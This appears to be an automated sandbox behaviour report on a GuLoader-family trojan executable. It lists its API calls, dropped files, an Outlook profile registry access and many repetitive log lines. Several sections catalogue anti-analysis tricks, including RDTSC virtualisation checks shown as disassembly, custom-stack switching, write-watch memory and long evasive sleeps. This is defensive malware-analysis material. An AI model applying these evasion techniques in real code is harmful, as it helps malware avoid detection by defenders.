Source: JOSXXL1.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/7@6/5

Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 0_2_004033B6 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_004033B6
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_004033B6 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		4_2_004033B6

Source: C:\Users\user\Desktop\JOSXXL1.exe

Code function: 0_2_004046E2 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004046E2

Source: C:\Users\user\Desktop\JOSXXL1.exe

Code function: 0_2_00402095 CoCreateInstance,

0_2_00402095

Source: C:\Users\user\Desktop\JOSXXL1.exe

File created: C:\Users\user\AppData\Local\indvandrings

Jump to behavior

Source: C:\Users\user\Desktop\JOSXXL1.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\JOSXXL1.exe

File created: C:\Users\user\AppData\Local\Temp\nsxA531.tmp

Jump to behavior

Source: JOSXXL1.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\JOSXXL1.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\JOSXXL1.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: JOSXXL1.exe

ReversingLabs: Detection: 57%

Source: C:\Users\user\Desktop\JOSXXL1.exe

File read: C:\Users\user\Desktop\JOSXXL1.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\JOSXXL1.exe "C:\Users\user\Desktop\JOSXXL1.exe"
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process created: C:\Users\user\Desktop\JOSXXL1.exe "C:\Users\user\Desktop\JOSXXL1.exe"
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process created: C:\Users\user\Desktop\JOSXXL1.exe "C:\Users\user\Desktop\JOSXXL1.exe"	Jump to behavior

Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: secur32.dll	Jump to behavior

Source: C:\Users\user\Desktop\JOSXXL1.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\JOSXXL1.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: JOSXXL1.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000000.00000002.2321723084.000000000890B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\JOSXXL1.exe

Code function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_10001B18

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 0_2_10002DE0 push eax; ret	0_2_10002E0E
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_3_0019CA98 pushfd ; retf 0019h	4_3_0019CA99
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_3_0019EE18 push eax; iretd	4_3_0019EE65
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_3_0019EE8C push eax; iretd	4_3_0019EEA9
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_3_0019CF4C push eax; iretd	4_3_0019CF4D
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_00159C30 push esp; retf 0017h	4_2_00159D55

Drops PE files

Source: C:\Users\user\Desktop\JOSXXL1.exe

File created: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\JOSXXL1.exe	API/Special instruction interceptor: Address: 91911FA
Source: C:\Users\user\Desktop\JOSXXL1.exe	API/Special instruction interceptor: Address: 49011FA

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\JOSXXL1.exe	RDTSC instruction interceptor: First address: 9155A4B second address: 9155A4B instructions: 0x00000000 rdtsc 0x00000002 test ecx, ebx 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F4434F42160h 0x00000008 test cl, 00000015h 0x0000000b inc ebp 0x0000000c test ah, ch 0x0000000e inc ebx 0x0000000f test ch, 00000077h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\JOSXXL1.exe	RDTSC instruction interceptor: First address: 48C5A4B second address: 48C5A4B instructions: 0x00000000 rdtsc 0x00000002 test ecx, ebx 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F4434B962A0h 0x00000008 test cl, 00000015h 0x0000000b inc ebp 0x0000000c test ah, ch 0x0000000e inc ebx 0x0000000f test ch, 00000077h 0x00000012 rdtsc

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\JOSXXL1.exe	Memory allocated: 110000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Memory allocated: 37450000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Memory allocated: 39450000 memory reserve \| memory write watch	Jump to behavior

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 599782	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 599657	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 599532	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 598913	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 598688	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 598229	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 597191	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 597063	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 596938	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 596813	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 596688	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 596579	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 596454	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 596329	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 596204	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 596078	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 595969	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 595824	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 595477	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 595355	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 595247	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 595117	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 595000	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 594891	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 594766	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 594657	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 594532	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 594407	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 594297	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 594188	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 594063	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 593938	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 593813	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 593688	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 593578	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 593469	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 593344	Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\Desktop\JOSXXL1.exe	Window / User API: threadDelayed 1665			Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Window / User API: threadDelayed 8156			Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\Desktop\JOSXXL1.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll

Jump to dropped file

Found large amount of non-executed APIs

Source: C:\Users\user\Desktop\JOSXXL1.exe

API coverage: 1.7 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep count: 40 > 30	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -36893488147419080s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -599891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6624	Thread sleep count: 1665 > 30	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6624	Thread sleep count: 8156 > 30	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -599782s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -599657s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -599532s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -599422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -599313s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -599188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -599063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -598913s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -598688s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -598360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -598229s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -598110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -597985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -597860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -597735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -597610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -597485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -597360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -597191s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -597063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -596938s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -596813s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -596688s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -596579s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -596454s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -596329s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -596204s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -596078s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -595969s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -595824s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -595477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -595355s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -595247s >= -30000s	Jump to behavior
